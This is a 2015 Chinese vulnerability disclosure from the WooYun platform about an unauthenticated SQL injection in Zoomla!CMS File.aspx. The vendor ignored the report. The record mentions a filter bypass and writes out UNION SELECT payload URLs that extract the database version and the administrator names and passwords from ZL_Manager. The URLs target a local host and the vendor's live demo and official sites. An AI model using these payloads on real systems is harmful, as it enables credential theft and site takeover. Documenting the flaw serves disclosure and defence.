漏洞概要
关注数(24)
关注此漏洞
漏洞标题:逐浪CMS注入影响CMS2全系列和CMS6.0版本以及影响官网(无需登陆)
提交时间:2015-06-15 10:13
修复时间:2015-09-18 10:15
公开时间:2015-09-18 10:15
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2015-06-15: 细节已通知厂商并且等待厂商处理中
2015-06-20: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-08-14: 细节向核心白帽子及相关领域专家公开
2015-08-24: 细节向普通白帽子公开
2015-09-03: 细节向实习白帽子公开
2015-09-18: 细节向公众公开
简要描述:
影响一下版本
Zoomla!CMS2_x1.5
Zoomla!CMS2_x2.0
Zoomla!CMS2_x2.1
Zoomla!CMS2_x2.2
Zoomla!CMS2_x2.3
Zoomla!CMS2_x2.4
Zoomla!CMS6.0
其他版本(未测试)
详细说明:
影响版本
详细分析如下:
问题文件:\Common\file.aspx
注:此问题文件包含两个注入
参数:code
代码分析如下:
那么我们可以构造利用代码如下:
本地:http://192.168.1.100:8087/Common/File.aspx?code='
但是这个时候访问会被sql注入拦截
那么我们看global中的拦截代码:
综合上面分析我采用下面的方式绕过以及注入
建立一个form表单代码如下:
将下面的URL填写到form中action中即可
1本地构造注入URL
1.1 获取版权
注:注入后会base.Response.Redirect(this.file.DownUrl)跳转地址 跳转URL中不能包含换行符 所以我这里采用截取的方式以及拼接的方式
http://192.168.1.100:8087/Common/File.aspx?code='union select null,1,SUBSTRING (@@VERSION,0,30),null,null,1,null--
1.2 获取管理员
http://192.168.1.100:8087/Common/File.aspx?code='union select null,1,STUFF(AdminPassword,1,0,AdminName),null,null,1,null from ZL_Manager--
2官方demo
2.1 获取版权
注:注入后会base.Response.Redirect(this.file.DownUrl)跳转地址 跳转URL中不能包含换行符 所以我这里采用截取的方式以及拼接的方式
http://demo.zoomla.cn/Common/File.aspx?code='union select null,1,SUBSTRING (@@VERSION,0,30),null,null,1,null--
2.2 获取管理员
http://demo.zoomla.cn/Common/File.aspx?code='union select null,1,STUFF(AdminPassword,1,0,AdminName),null,null,1,null from ZL_Manager--
漏洞证明:
3官方网
3.1 获取版权
注:注入后会base.Response.Redirect(this.file.DownUrl)跳转地址 跳转URL中不能包含换行符 所以我这里采用截取的方式以及拼接的方式
http://www.zoomla.cn/Common/File.aspx?code='union select null,1,SUBSTRING (@@VERSION,0,30),null,null,1,null--
3.2 获取管理员
http://www.zoomla.cn/Common/File.aspx?code='union select null,1,STUFF(AdminPassword,1,0,AdminName),null,null,1,null from ZL_Manager--
案例:
更多案例请看官网中的“成功案例”
http://www.zoomla.cn/case/
修复方案:
版权声明:转载请注明来源 Damo@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-09-18 10:15
厂商回复:
漏洞Rank:15 (WooYun评价)
最新状态:
暂无